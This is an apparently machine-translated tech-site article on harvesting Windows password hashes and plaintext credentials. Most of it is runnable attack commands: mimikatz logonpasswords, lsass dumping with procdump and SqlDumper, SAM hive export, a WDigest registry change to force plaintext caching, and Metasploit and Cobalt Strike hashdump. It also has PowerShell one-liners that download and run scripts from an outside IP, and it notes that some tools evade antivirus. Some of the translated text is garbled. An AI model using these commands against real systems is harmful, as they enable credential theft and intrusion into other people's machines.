Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to grab Windows hash. Many people may not know much about it. In order to let everyone know more, Xiaobian summarized the following contents for everyone. I hope everyone can gain something according to this article.

Windows password

Windows hash consists of two parts, LM HASH and NTLM HASH, which are two different encryption methods for the same password.

Composed of: username:RID:LM-HASH value:NTLM-HASH value

NTLM-Hash generation method is:

1. Convert plaintext passwords to hexadecimal format

2. Convert to Unicode format by adding 0x00 after each byte

3. MD4 encryption of Unicode strings to produce 32-bit hexadecimal strings

for example

Account password is cseroad@2008

Hexadecimal is 637365726f61644032303038

Unicode string is 63007300650072006f006100640040003200300030003800

NTLM-Hash is 82c58d8cec50de01fd109613369c158e

LM-Hash (LAN Hash Manager) is a hash encryption algorithm of Microsoft, essentially DES encryption, refer to LM-Hash & NTLM-Hash for specific principles.

When LM Hash is AAD3B435B51404EEAAD3B435B51404EE this indicates a null password or LM_Hash is not used.

I won't explain too much here, because LM hash is disabled since Windows Server 2008.

Tools to get hash

Principle: the lsass.exe process is used to implement windows security policies (local security policy and login policy). Tools can be used to export hash values and plaintext passwords from the lsass.exe process in memory or SAM files. SAM files are stored in the C:\Windows\System32\config directory and are locked from copying.

The following tools all run as administrators

QuarksPwDump tool

The tool supports Windows XP/2003/Vista/7/2008 versions and is fairly stable.

You can capture many types of user credentials under the windows platform, including: local accounts, domain accounts, cached domain accounts.

Download address: codeload.github.com/quarkslab/quarkspwdump/zip/master

The full source code is available at https://github.com/quarkslab/quarkspwdump

Quarkspwdump.exe --dump-hash-local Export user NTLM Hash

LaZagne Tools

LaZagne is an open source application for retrieving passwords stored locally on computers.

This tool can not only capture windows password, but also capture cached passwords, SVN passwords, wifi passwords, email passwords and other functions in the browser. It is suitable for windows, Linux and MAC.

Download address https://github.com/AlessandroZ/LaZagne

run command

LaZagne.exe all

getpass.exe tool

This tool is compiled by Lightning Boy according to mimikatz and can directly obtain plaintext passwords. Run getpass.exe directly.

Pwdump7.exe Tool

Copy libeay32.dll and Pwdump7.exe and run Pwdump7.txt directly in the same directory

WCE tools

The tool is divided into 32 bits and 64 bits. It enumerates login sessions and can add, change, and delete credentials. command is

wce.exe -w Read system plaintext password

wme.exe -l Get hash

powershell Script Get-PassHashes.ps1 Script

cmd Direct Run Command

powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Get-PassHashes.ps1');Get-PassHashes

Get-PassHashes.ps1 Script

cmd Direct Run Command

powershell iex (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes

Invoke-Mimikatz.ps1 Script

Still using mimikatz to read passwords

powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Invoke-Mimikatz.ps1'); Invoke-MimikatzOut-Minidump.ps1 script

Get dumps for lsass.exe

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"

Then use mimikatz to get plaintext from dumps.

mimikatz.exe "sekurlsa::minidump lsass_528.dmp" "sekurlsa::logonPasswords full" exitmimikatz tool

It can be used to grab hash and plaintext. command is

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

When the system is win10 or 2012R2 or above, it is forbidden to save plaintext passwords in the memory cache by default. In this case, plaintext can be retrieved by modifying the registry, but the user needs to log in again before it can be successfully retrieved. Modify the registry command to:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Hash can be captured after restart

SAM table get hash

Export Export SAM and System files

reg save HKLM\SYSTEM sys.hiv reg save HKLM\SAM sam.hiv

Export SAM and System files of registry to local disk. Use mimikatz to read SAM and System files. NTLM Hash is available

mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit

metaploit framework

On the basis of getting the session, try to grab the hash value. Metasploit supports multiple hash fetches.

1. The hashdump command can grab hash under system permission.

2.windows/gather/smart_hashdump script to get user hash in domain

And export all hashes to/root/.msf4/loot/20200218155855_default_10.211.55.16_windows.hashes_396577.txt

3. load mimikatz command Load mimikatz

msv Get hashkertle Get plaintext ssp Get plaintext information tspkg Attempt to retrieve tspkg credentials wdigest Try retrieving wdigest credentials mimikatz_command -f samdump::hashes Get hashmimikatz_command -f sekurlsa::searchPasswords Get plaintext password

Cobalt strike framework

Dump Hashes #Get hashRun Mimikatz #Run Mimikatz

The beacon corresponds to the command being executed

hashdump Get hash value logonPasswords equivalent to mimikatz_command -f sekurlsa::searchPasswords

Empire framework

Empire also has a built-in mimikatz to read hash.

kill-free prodump.exe tool

This tool is Microsoft produced tools, with a certain kill effect. You can use procdump to export the memory file of the lsass process locally, and then use mimikatz to read the password locally.

procdump.exe -accepteula -ma lsass.exe lsass.dmp derived lsass.dmp

Then use mimikatz to read the password

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

Note that lsass.dmp exported from the target machine needs to run on the same system.

SqlDumper.exe Tool

The tool is also Microsoft products, also has a certain ability to avoid killing.

SqlDumper.exe is stored by default in C:\Program Files\Microsoft SQL Server\number\Shared, where number represents the version of SQL Server. If SQL Server is not installed on the target machine, upload SqlDumper.exe yourself

tasklist /svc |findstr lsass.exe View ProcessID of lsass.exe Sqldumper.exe ProcessID 0 0x01100 Export dump file

mimikatz loading dump files

mimikatz.exe "sekurlsa::minidumpSQLDmpr0002.mdmp" "sekurlsa::logonPasswords full" exit

SharpDump tool

Out-Minidump.ps1 Compiled results of C#version of script.

The file with the suffix bin that exports the lsass.exe process data out of dump is dragged onto the local machine, renamed to zip, and then decompressed and read using the local mimikatz.

mimikatz.exe "sekurlsa::minidump debug520" "sekurlsa::logonPasswords full" "exit"

After reading the above, do you have any further understanding of how to grab windows hash? If you still want to know more knowledge or related content, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.